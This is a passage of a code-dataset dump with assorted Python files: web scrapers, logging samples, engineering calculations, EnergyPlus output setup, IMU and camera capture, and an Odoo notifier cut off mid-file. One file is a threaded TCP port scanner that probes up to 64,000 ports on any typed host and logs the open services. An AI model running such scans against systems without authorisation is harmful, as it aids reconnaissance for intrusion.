cfg['test'])\n# print('x' in cfg['test2'])\n#\nprint(cfg._dict)\n#\n# with open(newfilename, 'w') as f:\n# cfg.write(f)","sub_path":"练习/处理csv与ini文件/处理csv与ini文件.py","file_name":"处理csv与ini��件.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446993883","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport requests\nimport json\n\n# URL = 'http://www.wanfangdata.com.cn/searchResult/getCoreSearch.do?d=0.1815591873188529'\n# headers = {\n# \"User-Agent\": 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',\n# \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\"\n# }\n# datas = {\n# \"paramStrs\": \"主题:(汉韩)\",\n# \"classType\": \"degree-degree_artical\",\n# \"pageNum\": 1,\n# \"pageSize\": 20,\n# \"isSearchSecond\": \"false\",\n# \"chineseEnglishExpand\": \"false\",\n# \"topicExpand\": \"false\",\n# \"searchWay\": \"AdvancedSearch\",\n# \"corePerio\": \"false\",\n# }\n#\n# session = requests.session()\n# res = session.post(URL, data=datas, headers=headers)\n# data = res.content.decode()\n# print(data)\n\n# id_list = []\n#\n# num = 22\n# for page_id in range(1, num):\n#\n# datas = {\n# \"paramStrs\": \"主题:(汉韩)\",\n# \"classType\": \"degree-degree_artical\",\n# \"pageNum\": page_id,\n# \"pageSize\": 20,\n# \"isSearchSecond\": \"false\",\n# \"chineseEnglishExpand\": \"false\",\n# \"topicExpand\": \"false\",\n# \"searchWay\": \"AdvancedSearch\",\n# \"corePerio\": \"false\",\n# }\n#\n# session = requests.session()\n# res = session.post(URL, data=datas, headers=headers)\n# data = res.content.decode()\n# print(data)\n# # info = json.loads(data)\n# # for thesisnum in info['pageRow']:\n# # id_list.append(thesisnum['id'])\n# # print('第{}页:'.format(page_id))\n\n\n# url = 'http://d.wanfangdata.com.cn/Detail/Thesis/'\n# headers = {\n# \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\",\n# \"Content-Type\": \"application/json;charset=UTF-8\",\n# \"Host\":\"d.wanfangdata.com.cn\"\n# }\n# body = {\n# \"Id\": \"D048000\"\n# }\n#\n# res = requests.post(url, headers=headers, json=body)\n# data = res.content.decode()\n# print(data)\n\n\nurl = ' http://d.wanfangdata.com.cn/Detail/Thesis/' # 坑,一定要从requests URL复制\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\",\n \"Content-Type\": \"application/json;charset=UTF-8\",\n \"Host\": \"d.wanfangdata.com.cn\"\n}\nbody = {\n \"Id\": \"D048000\"\n}\n\njson_list = []\nfor i in range(0, len(id_list) + 1):\n thesis_id = '{}'.format(i)\n body['ID'] = thesis_id\n res = requests.post(url, headers=headers, json=body)\n data = res.content.decode()\n print(data)\n info = json.loads(data)\n # print(info)\n json_infos = {\n \"文章标题\": info['detail'][0]['thesis']['Title'],\n \"关键词\": info['detail'][0]['thesis']['Keywords'],\n \"摘要\": info['detail'][0]['thesis']['Abstract'],\n \"作者\": info['detail'][0]['thesis']['Creator'],\n \"作者单位\": info['detail'][0]['thesis']['OrganizationNorm'],\n \"层次\": info['detail'][0]['thesis']['Degree'],\n \"专业\": info['detail'][0]['thesis']['Major'],\n \"导师\": info['detail'][0]['thesis']['Tutor'],\n\n \"链接\": 'http://d.wanfangdata.com.cn/Detail/Thesis/' + info['detail'][0]['thesis']['Id']\n # \"在线发表时间\":['pageRow'],#??\n }\n json_list.append(json_infos)\nprint(json_infos)\n","sub_path":"web_spider/get_wanfang_serach_data.py","file_name":"get_wanfang_serach_data.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"590799873","text":"from urllib.request import urlopen, Request\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\n\r\n\r\n\r\n\r\ntheurl = urlopen(Request(\"http://www.culturalindia.net/monuments/taj-mahal.html\", headers={'User-Agent': 'Mozilla'}))\r\nsoup = BeautifulSoup(theurl,\"html.parser\")\r\n\r\nheader=\"TAJ MAHAL\\n\"\r\nfile = open(os.path.expanduser(\"mm1.txt\"),\"wb\")\r\nfor record in soup.findAll(\"div\"):\r\n for data in record.findAll(\"p\"):\r\n set = data.text\r\n print(set)\r\n file.write(bytes(header, encoding=\"ascii\", errors='ignore'))\r\n file.write(bytes(set, encoding=\"ascii\", errors='ignore'))\r\n\r\nfile.close()\r\n\r\nf = open('mm1.txt', 'r+')\r\nn = f.read().replace(',', ',\\n')\r\nf.truncate(0)\r\nf.write(n)\r\nf.close()\r\n\r\n\r\n","sub_path":"searchengine/backenddata collector/monuments/monumentdescription.py","file_name":"monumentdescription.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"469550600","text":"# http://www.blog.pythonlibrary.org/2012/08/02/python-101-an-intro-to-logging/\r\n# otherMod.py\r\nimport logging, sys\r\n\r\n# module_logger = logging.getLogger(\"exampleApp.altroModulo\")\r\n# print globals()\r\n# print __file__\r\n# print __name__\r\n\r\nlogger = None\r\nloggerName = None\r\n\r\ndef initLog(logID):\r\n global loggerName, logger\r\n loggerName = logID + '.' + __name__\r\n logger = logging.getLogger(loggerName)\r\n\r\n#----------------------------------------------------------------------\r\ndef add(x, y):\r\n # global logger\r\n funcName = sys._getframe().f_code.co_name\r\n logger.info(\"added %s and %s to get %s\" % (x, y, x+y))\r\n\r\n # logger = logging.getLogger(loggerName + '.'+ funcName)\r\n # logger1 = logging.getLogger(loggerName + \".add\")\r\n # logger.info(\"added %s and %s to get %s\" % (x, y, x+y))\r\n\r\n # logger = logging.getLogger(\"exampleApp.otherMod2.add\")\r\n # logger.info(\"added %s and %s to get %s\" % (x, y, x+y))\r\n\r\n return x+y","sub_path":"LnLogger/Samples/YAML_newLogger/Modulo_02.py","file_name":"Modulo_02.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"226313290","text":"# @Author : Xavier Faure\n# @Email : xavierf@kth.se\n\nfrom eppy.results import readhtml\nimport esoreader\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef getOutputList(path,idf,OutputsFile):\n OutputsVar = {}\n OutputsVar['Var'] = []\n outputs = open(os.path.join(path,OutputsFile), 'r')\n Lines = outputs.readlines()\n for line in Lines:\n tofind = 'Reporting_Frequency ='\n if tofind in line:\n OutputsVar['Reportedfrequency'] = line[line.index(tofind)+len(tofind)+1:-1]\n if '## ' in line[:3]:\n var = line[3:][::-1]\n var2add = var[var.index('[')+2:var.index(',')][::-1]\n keep = True\n if 'People' in var2add and len(idf.idfobjects[\"PEOPLE\"])==0:\n keep = False\n if keep:\n OutputsVar['Var'].append(var2add)\n return OutputsVar\n\ndef AddOutputs(idf,building,path,EMSOutputs,OutputsFile):\n\n OutputsVar = getOutputList(path,idf,OutputsFile)\n #we shall start by removing all predclared outputes from the template\n predef = idf.idfobjects[\"OUTPUT:VARIABLE\"]\n for i in reversed(predef):\n idf.removeidfobject(i)\n idf.newidfobject(\n \"OUTPUT:DIAGNOSTICS\",\n Key_1=\"DISPLAYEXTRAWARNINGS\",\n )\n\n for var in OutputsVar['Var']:\n idf.newidfobject(\n \"OUTPUT:VARIABLE\",\n Variable_Name=var,\n Reporting_Frequency=OutputsVar['Reportedfrequency'],\n )\n zonelist = getHeatedZones(idf)\n if EMSOutputs:\n setEMS4MeanTemp(idf, zonelist, OutputsVar['Reportedfrequency'],EMSOutputs[0])\n setEMS4TotHeatPow(idf, building,zonelist, OutputsVar['Reportedfrequency'], EMSOutputs[1])\n if len(EMSOutputs)>2:\n setEMS4TotDHWPow(idf, building, zonelist, OutputsVar['Reportedfrequency'], EMSOutputs[2])\n return idf\n\ndef getHeatedZones(idf):\n #returns the zone names that are above ground levels, which means heated zones\n zoneName = []\n AllZone = idf.idfobjects[\"ZONE\"]\n for idx, zone in enumerate(AllZone):\n if int(zone.Name[zone.Name.find('Storey')+6:]) >= 0: #the name ends with Storey # so lets get the storey number this way\n zoneName.append(zone.Name)\n return zoneName\n\ndef setEMS4MeanTemp(idf,zonelist,Freq,name):\n #lets create the temperature sensors for each zones and catch their volume\n for idx,zone in enumerate(zonelist):\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:SENSOR',\n Name = 'T'+str(idx),\n OutputVariable_or_OutputMeter_Index_Key_Name = zone,\n OutputVariable_or_OutputMeter_Name = 'Zone Mean Air Temperature',\n )\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:INTERNALVARIABLE',\n Name = 'Vol'+str(idx),\n Internal_Data_Index_Key_Name = zone,\n Internal_Data_Type = 'Zone Air Volume'\n )\n #lets create the prgm collingManager\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAMCALLINGMANAGER',\n Name='Average Building Temperature',\n EnergyPlus_Model_Calling_Point='EndOfZoneTimestepBeforeZoneReporting' ,\n Program_Name_1='AverageZoneTemps'\n )\n #lets create the global Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:GLOBALVARIABLE',\n Erl_Variable_1_Name='AverageBuildingTemp' ,\n )\n #lets create the EMS Output Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:OUTPUTVARIABLE',\n Name=name,\n EMS_Variable_Name='AverageBuildingTemp' ,\n Type_of_Data_in_Variable='Averaged',\n Update_Frequency = 'ZoneTimeStep'\n )\n #lets create the program\n listofTemp = ['T'+str(i) for i in range(len(zonelist))]\n listofVol = ['Vol' + str(i) for i in range(len(zonelist))]\n SumNumerator = ''\n SumDenominator = ''\n for idx,Temp in enumerate(listofTemp):\n SumNumerator = SumNumerator+Temp+'*'+listofVol[idx]+'+'\n SumDenominator = SumDenominator + listofVol[idx] + '+'\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAM',\n Name='AverageZoneTemps',\n Program_Line_1='SET SumNumerator = '+SumNumerator[:-1],\n Program_Line_2='SET SumDenominator = '+SumDenominator[:-1],\n Program_Line_3='SET AverageBuildingTemp = SumNumerator / SumDenominator',\n )\n #lets create now the ouputs of this EMS\n idf.newidfobject(\n 'OUTPUT:ENERGYMANAGEMENTSYSTEM',\n Actuator_Availability_Dictionary_Reporting='Verbose',\n EMS_Runtime_Language_Debug_Output_Level='Verbose',\n Internal_Variable_Availability_Dictionary_Reporting='Verbose',\n )\n #lets create now the final outputs\n idf.newidfobject(\n 'OUTPUT:VARIABLE',\n Variable_Name=name,\n Reporting_Frequency=Freq,\n )\n\ndef setEMS4TotHeatPow(idf,building,zonelist,Freq,name):\n #lets create the temperature sensors for each zones and catch their volume\n for idx,zone in enumerate(zonelist):\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:SENSOR',\n Name = 'Pow'+str(idx),\n OutputVariable_or_OutputMeter_Index_Key_Name = zone+' IDEAL LOADS AIR SYSTEM',\n OutputVariable_or_OutputMeter_Name = 'Zone Ideal Loads Supply Air Total Heating Rate'\n )\n #lets create the prgm collingManager\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAMCALLINGMANAGER',\n Name='Compute Total Building Heat Pow',\n EnergyPlus_Model_Calling_Point='EndOfZoneTimestepBeforeZoneReporting' ,\n Program_Name_1='TotZonePow'\n )\n #lets create the global Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:GLOBALVARIABLE',\n Erl_Variable_1_Name='TotBuildPow' ,\n )\n #lets create the EMS Output Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:OUTPUTVARIABLE',\n Name=name,\n EMS_Variable_Name='TotBuildPow' ,\n Type_of_Data_in_Variable='Averaged',\n Update_Frequency = 'ZoneTimeStep'\n )\n #lets create the program\n listofPow = ['Pow'+str(i) for i in range(len(zonelist))]\n SumNumerator = ''\n for idx,Pow in enumerate(listofPow):\n SumNumerator = SumNumerator+Pow+'+'\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAM',\n Name='TotZonePow',\n Program_Line_1='SET TotBuildPow = '+ SumNumerator[:-1],\n )\n #to uncomment if the EMS is not created before for the mean air tempeatrue\n # #lets create now the ouputs of this EMS\n # idf.newidfobject(\n # 'OUTPUT:ENERGYMANAGEMENTSYSTEM',\n # Actuator_Availability_Dictionary_Reporting='Verbose',\n # EMS_Runtime_Language_Debug_Output_Level='Verbose',\n # Internal_Variable_Availability_Dictionary_Reporting='Verbose',\n # )\n\n #lets create now the final outputs\n idf.newidfobject(\n 'OUTPUT:VARIABLE',\n Variable_Name=name,\n Reporting_Frequency=Freq,\n )\n\ndef setEMS4TotDHWPow(idf,building,zonelist,Freq,name):\n #lets create the temperature sensors for each zones and catch their volume\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:SENSOR',\n Name = 'DHWPow',\n OutputVariable_or_OutputMeter_Index_Key_Name = 'DHW',\n OutputVariable_or_OutputMeter_Name = 'Water Use Equipment Heating Rate'\n )\n\n #lets create the prgm collingManager\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAMCALLINGMANAGER',\n Name='Compute Total DHW Heat Pow',\n EnergyPlus_Model_Calling_Point='EndOfZoneTimestepBeforeZoneReporting' ,\n Program_Name_1='prgmDHWPow'\n )\n #lets create the global Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:GLOBALVARIABLE',\n Erl_Variable_1_Name='TotDHWPow' ,\n )\n #lets create the EMS Output Variable\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:OUTPUTVARIABLE',\n Name=name,\n EMS_Variable_Name='TotDHWPow' ,\n Type_of_Data_in_Variable='Averaged',\n Update_Frequency = 'ZoneTimeStep'\n )\n #lets create the program\n SumNumerator = 'DHWPow'\n idf.newidfobject(\n 'ENERGYMANAGEMENTSYSTEM:PROGRAM',\n Name='prgmDHWPow',\n Program_Line_1='SET TotDHWPow = '+ SumNumerator,\n )\n #to uncomment if the EMS is not created before for the mean air tempeatrue\n # #lets create now the ouputs of this EMS\n # idf.newidfobject(\n # 'OUTPUT:ENERGYMANAGEMENTSYSTEM',\n # Actuator_Availability_Dictionary_Reporting='Verbose',\n # EMS_Runtime_Language_Debug_Output_Level='Verbose',\n # Internal_Variable_Availability_Dictionary_Reporting='Verbose',\n # )\n\n #lets create now the final outputs\n idf.newidfobject(\n 'OUTPUT:VARIABLE',\n Variable_Name=name,\n Reporting_Frequency=Freq,\n )\n\ndef Read_OutputsEso(CaseName,ExtSurfNames, ZoneOutput):\n #visualization of the results\n eso = esoreader.read_from_path(CaseName)\n ZoneAgregRes = {}\n BuildAgregRes = {}\n #We agregate results per storey\n res ={}\n for idx in eso.dd.variables.keys():\n currentData = eso.dd.variables[idx]\n if 'Surface' in currentData[2] and currentData[1] not in ExtSurfNames:\n continue\n if currentData[1].find('STOREY')>0:\n try:\n nb = int(currentData[1][currentData[1].find('STOREY')+6:])\n except:\n test = 1\n finished = 0\n while finished == 0:\n try:\n nb = int(currentData[1][currentData[1].find('STOREY')+6:-test])\n finished = 1\n except:\n test += 1\n Firstkey = 'STOREY '+str(nb)\n else:\n Firstkey = currentData[1]\n if not res:\n res[Firstkey] = {}\n ZoneAgregRes[Firstkey] = {} #currentData[1]\n if not currentData[1] in res.keys():\n findsame = 0\n for key in res.keys():\n if currentData[1] in key or key in currentData[1]:\n Firstkey = key\n findsame = 1\n if not findsame:\n res[Firstkey] = {}\n ZoneAgregRes[Firstkey] = {}\n if not currentData[2] in res[Firstkey].keys():\n res[Firstkey][currentData[2]] = {}\n ZoneAgregRes[Firstkey][currentData[2]] = {}\n res[Firstkey][currentData[2]]['Data'] = []\n res[Firstkey][currentData[2]]['Data'].append(eso.data[idx])\n res[Firstkey][currentData[2]]['TimeStep'] = currentData[0]\n res[Firstkey][currentData[2]]['Unit'] = currentData[3]\n BuildAgregRes['HeatedArea']= {}\n BuildAgregRes['NonHeatedArea'] = {}\n BuildAgregRes['Other']= {}\n for nb, key in enumerate(res):\n KeyArea = 'Other'\n if 'STOREY' in key:\n numstor= int(key[6:])\n KeyArea= 'NonHeatedArea' if numstor<0 else 'HeatedArea'\n for j, i in enumerate(res[key]):\n ZoneAgregRes[key][i]['GlobData'] = []\n ZoneAgregRes[key][i]['TimeStep'] = res[key][i]['TimeStep']\n ZoneAgregRes[key][i]['Unit'] = res[key][i]['Unit']\n ZoneAgregRes[key][i]['NbNode'] = len(res[key][i]['Data'])\n #here I need to introduce some filtering in order to catch only outside facing surfaces (to compare core/perimeter thermal zoning woth other kind\n if res[key][i]['Unit'] in {'C','W/m2-K','W/m2'}: #then lets compute the mean, if not lets sum it\n for ii in zip(*res[key][i]['Data']):\n ZoneAgregRes[key][i]['GlobData'].append(sum(ii)/len(res[key][i]['Data']))\n else:\n for ii in zip(*res[key][i]['Data']):\n ZoneAgregRes[key][i]['GlobData'].append(sum(ii))\n #lets deal with data now at the building level\n if not i in BuildAgregRes[KeyArea].keys():\n BuildAgregRes[KeyArea][i] = {}\n BuildAgregRes[KeyArea][i]['GlobData'] = ZoneAgregRes[key][i]['GlobData']\n BuildAgregRes[KeyArea][i]['TimeStep'] = ZoneAgregRes[key][i]['TimeStep']\n BuildAgregRes[KeyArea][i]['Unit'] = ZoneAgregRes[key][i]['Unit']\n BuildAgregRes[KeyArea][i]['NbNode'] = ZoneAgregRes[key][i]['NbNode']\n else:\n if res[key][i]['Unit'] in {'C','W/m2-K','W/m2'}:\n BuildAgregRes[KeyArea][i]['GlobData'] = [sum(x)/2 for x in zip(BuildAgregRes[KeyArea][i]['GlobData'], ZoneAgregRes[key][i]['GlobData'])]\n else:\n BuildAgregRes[KeyArea][i]['GlobData'] = [sum(x) for x in zip(BuildAgregRes[KeyArea][i]['GlobData'], ZoneAgregRes[key][i]['GlobData'])]\n\n return ZoneAgregRes if ZoneOutput else BuildAgregRes\n\ndef Plot_Outputs(res,idf):\n # visualization of the results\n timestp = idf.idfobjects['TIMESTEP'][0].Number_of_Timesteps_per_Hour\n endtime = int(len(res['Environment']['Site Outdoor Air Drybulb Temperature']['GlobData']) / timestp)\n for nb,key in enumerate(res):\n plt.figure(nb)\n for j,i in enumerate(res[key]):\n plt.subplot(2,int((len(res[key])-1)/2+1),j+1)\n if not res[key][i]['TimeStep'] in 'TimeStep':\n timestp = 1\n plt.plot(np.linspace(0, endtime, endtime * timestp), res[key][i]['GlobData'])\n plt.title(i+'('+res[key][i]['Unit']+')')\n\n plt.show()\n\ndef Read_Outputhtml(CaseName):\n #compairons of surfaces\n fname = CaseName\n filehandle = open(fname, 'r',encoding='latin-1').read() # get a file handle to the html file\n htables = readhtml.titletable(filehandle)\n #this few lines below is just to grab the names of outdoor facing surfaces and windows\n for i in range(len(htables)):\n if htables[i][0] in 'Opaque Exterior':\n Opaque_exterior = htables[i][1][1:]\n elif htables[i][0] in 'Exterior Fenestration':\n Windows_exterior = htables[i][1][1:]\n EndUsesIdx = 3\n ExtSurf = [name[0] for name in Opaque_exterior if 'WALL' in name[1]]\n ExtWin = [name[0] for name in Windows_exterior]\n ExtNames = ExtSurf+ExtWin\n Res = {}\n\n for key in range(len(htables[EndUsesIdx][1][1:-2])):\n Res[htables[EndUsesIdx][1][key+1][0]] = {}\n for val in range(len(htables[EndUsesIdx][1][0][1:])):\n Res[htables[EndUsesIdx][1][key+1][0]][htables[EndUsesIdx][1][0][val+1]] = htables[EndUsesIdx][1][key+1][val+1]\n return {'GlobRes':Res, 'OutdoorSurfacesNames' : ExtNames}\n\ndef Read_OutputError(CaseName):\n fname = CaseName\n Endsinfo = open(fname, 'r', encoding='latin-1').read()\n Endsinfo\n\nif __name__ == '__main__' :\n print('Set_Outputs Main')","sub_path":"CoreFiles/Set_Outputs.py","file_name":"Set_Outputs.py","file_ext":"py","file_size_in_byte":14607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"591289103","text":"#!/usr/bin/env python3\n#-*- coding: utf-8 -*-\nM= [[0,0,0] for i in range(3)] \nM5=M\nM3=M[:]\nprint(M5)\nprint(M3[1][1])\nM[1][1]=5\nprint(M)\nimport copy\nM4=copy.deepcopy(M)\nM5=M\nM[1][1]=0\nprint(M4)\nprint(M5)","sub_path":"INF_1_BE_1/ListeCopie.py","file_name":"ListeCopie.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"545319484","text":"import django_filters\nfrom .models import Item, Category\nfrom django_filters import rest_framework as filters\n\n\nclass ItemFilter(django_filters.FilterSet):\n \n\n CHOICES = (\n ('ascending', 'Ascending'),\n ('descending', 'Decending')\n ) \n ordering = django_filters.ChoiceFilter(label='Ordering', choices=CHOICES, method='filter_by_order')\n \n\n class Meta:\n model = Item\n fields = {\n 'title':['icontains'],\n 'price': ['lt', 'gt'],\n \n }\n def filter_by_order(self,queryset,name,value):\n expression = 'pub_date' if value=='ascending' else '-pub_date'\n return queryset.order_by(expression)","sub_path":"core/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"300681770","text":"import socket\nimport _thread\nimport time\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\nclass Core(object):\n ipurl=0\n mode=1024\n menu1=False\n f=None\n network_speed=\"LAN\"\n menu2=False\n def GetData(self, url):\n self.url = url\n try:\n self.ipurl = socket.gethostbyname(self.url)\n except Exception as e:\n print (\"Invalid URL or IP\")\n exit(0)\n Core.ipurl=self.ipurl\n print (60*\"-\")\n print (22*\" \",bcolors.FAIL,\"Port Scanner v1\",bcolors.ENDC)\n print (60*\"-\")\n while Core.menu1 is not True:\n choice = input(\"\\n1 - simple \\n2 - extended\\n\")\n if choice == \"1\":\n Core.mode=1024\n menu=True\n break\n elif choice == \"2\":\n Core.mode=64000\n menu = True\n break\n else:\n print(\"Incorrect answer, choose 1 or 2\")\n while Core.menu2 is not True:\n choice = input(\"\\n1 - LAN \\n2 - Global Network\\n\")\n if choice == \"1\":\n Core.network_speed=0.05\n menu2=True\n break\n elif choice == \"2\":\n Core.network_speed=0.3\n menu2 = True\n break\n else:\n print(\"Incorrect answer, choose 1 or 2\")\n\n def Start_Scan(self, port_start, port_end):\n Core.f = open(Core.ipurl, \"a\")\n try:\n for x in range(port_start,port_end):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n res = sock.connect_ex((Core.ipurl,x))\n if res is 0:\n tmp=\"Port\",x,\"is open\", socket.getservbyport(x)\n tmp1=str(tmp[0])+\" \"+str(tmp[1])+\" \"+str(tmp[2])+\" \"+str(tmp[3])\n print(bcolors.OKGREEN,tmp1)\n Core.f.write(str(tmp)+\"\\n\")\n Core.f.close()\n except Exception as e:\n print (e)\ntry:\n scan = Core()\n scan.GetData(input(\"Type IP or address\\n\"))\n print(bcolors.WARNING,\"Range:\",Core.mode,\"\\n Target:\",Core.ipurl,\"\\n Scanning speed:\",Core.network_speed,bcolors.ENDC)\n print(bcolors.BOLD,\"Please wait...\",bcolors.ENDC)\n for count in range(0,Core.mode):\n #print (Core.mode)\n time.sleep(Core.network_speed)\n _thread.start_new_thread(scan.Start_Scan, (count,count+1))\n if count > Core.mode:\n exit(0)\nexcept Exception as e:\n print (e)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"120953099","text":"from keras.preprocessing.image import ImageDataGenerator\n\n\ndef train_on_gen(dirname, shape_target=(224,224)):\n train_datagen = ImageDataGenerator()\n train_generator = train_datagen.flow_from_directory(\n directory=dirname,\n target_size=shape_target,\n color_mode=\"rgb\",\n batch_size=32,\n class_mode=\"categorical\",\n shuffle=True,\n seed=42\n )\n return train_generator","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"275597014","text":"\"\"\"\nProjeto final de Eletrónica de Potência 2015/2016.\nCálculo do condensador.\n\"\"\"\n\n__author__ = \"paulogp\"\n__copyright__ = \"Copyright (C) 2015 Paulo G.P.\"\n__date__ = \"09/12/2015\"\n\n\ndef T(f):\n \"\"\"\n Período.\n :param f: float - frequência\n :return: float\n \"\"\"\n return 1 / f\n\n\ndef vo(_D, _vi):\n \"\"\"\n Tensão de saída.\n :param D: float - razão cíclica\n :param vi: float - tensão de entrada\n :return: float\n \"\"\"\n return _D * _vi\n\n\ndef C_out(_D, _T, _vo, _L, _Dvo):\n \"\"\"\n Condensador de saída.\n :param D: float - razão cíclica\n :param T: float - período\n :param vi: float - tensão de entrada\n :param L: float - indutância\n :param Dvo: float - ondulação da tensão de saída\n :return: float\n \"\"\"\n return ((1 - _D) * _T**2 * _vo) / (8 * _L * _Dvo)\n\nif __name__ == \"__main__\":\n # parametros\n D = 0.5 # 0.4\n vi = 11\n f = 40000 # 50000\n L = 680 * 10**-6\n Dvo = 0.1\n\n # output\n print(\"T: {:.3}s\".format(T(f)))\n print(\"vo: {:.3}V\".format(vo(D, vi)))\n print(\"Co: {:.3}F\".format(C_out(D, T(f), vo(D, vi), L, Dvo)))\n","sub_path":"eltrp/calculo_projeto.py","file_name":"calculo_projeto.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84775439","text":"import logging\n\nlogging.basicConfig(level=logging.DEBUG)\nLOG = logging.getLogger(__name__)\n\n# create a file handler\nhandler = logging.FileHandler('cart_Log.log')\n\n# create a logging format\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\n\n# add the handlers to the logger\nLOG.addHandler(handler)\n","sub_path":"src/com/jalasoft/shopping_car/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"313363196","text":"#!/usr/bin/env python\n\nimport numpy as np\nimport time\nfrom nxp_imu import IMU\nfrom slurm.rate import Rate\nfrom the_collector import BagIt, Pickle\nfrom colorama import Fore\nfrom threaded_camera import ThreadedCamera\n\nthumb = False\nbag = BagIt(Pickle)\nimu = IMU(gs=2, dps=2000, verbose=True)\nrate = Rate(20)\n\n# res = (3008,480)\n# res = (1024,720)\n# res = (640,480)\nres = (320,240)\ncamera = ThreadedCamera(res, fmt=\"gray\")\n\nstart = time.time()\nlast = start\ntry:\n while True:\n a, m, g = imu.get()\n ts = time.time()\n dt = ts - last\n hz = int(1/dt)\n last = ts\n print('{} Hz/{:.2f} s | {:>5.2f} {:>5.2f} {:>5.2f} | {:>6.1f} {:>6.1f} {:>6.1f} | {:>6.1f} {:>6.1f} {:>6.1f} |'.format(\n hz,dt,\n a[0], a[1], a[2],\n m[0], m[1], m[2],\n g[0], g[1], g[2]),\n end = \"\\r\"\n )\n bag.push(\"imu\", (a,g,m,time.time(),))\n\n frame = camera.read()\n\n if frame is None:\n print(f\"{Fore.RED}*** Camera Fail ***{Fore.RESET}\")\n else:\n bag.push(\"camera\", (frame,time.time(),))\n\n rate.sleep()\n\nexcept KeyboardInterrupt:\n camera.stop()\n camera.join()\n print(\">> bye ...\")\n bag.write(\"test\", timestamp=False)\n","sub_path":"python/dev/path-data/grab-data.py","file_name":"grab-data.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109958896","text":"from datetime import datetime, date, time, timedelta\nfrom openerp import models, fields, api\nfrom openerp.tools.translate import _\nfrom openerp.osv import osv\n\n\nclass CustomSalesQuotation(models.Model):\n _inherit = 'sale.order'\n\n days_without_activity = fields.Integer(string=\"Notify after (days)\", default=5)\n group_to_be_notified = fields.Many2one('res.groups',string=\"Group to be notified\")\n inactivity_notification = fields.Boolean(string=\"Inactivity Notification\", default=True)\n notification_has_been_generated = fields.Boolean(string=\"Notification Generated\", default=False)\n\n @api.model\n def _get_see_all_leads_group(self):\n res = self.env['res.groups'].search([('name', '=', 'See all Leads')], limit=1)\n return res and res.id or False\n\n _defaults = {\n 'group_to_be_notified' : _get_see_all_leads_group,\n }\n\n\n @api.multi\n def check_for_inactive_quotations(self):\n\n #get the quotations in draft and have the inactivity notifier activated\n quotations = self.env['sale.order'].search([('state', '=', 'draft'),('inactivity_notification', '=', True),\n ('notification_has_been_generated', '=', False)])\n subtype = self.env['mail.message.subtype'].search([('id', '=', 1)])\n\n # For each quotation, check if the difference between the creation date\n # and update date is already equal or in excess of the\n # days without activity\n for quotation in quotations:\n write_date = datetime.strptime(quotation.write_date, '%Y-%m-%d %H:%M:%S')\n create_date = datetime.strptime(quotation.create_date, '%Y-%m-%d %H:%M:%S')\n days_inactivity = write_date - create_date\n\n pref_msg = \"Quotation number {} did not have any activity for the past 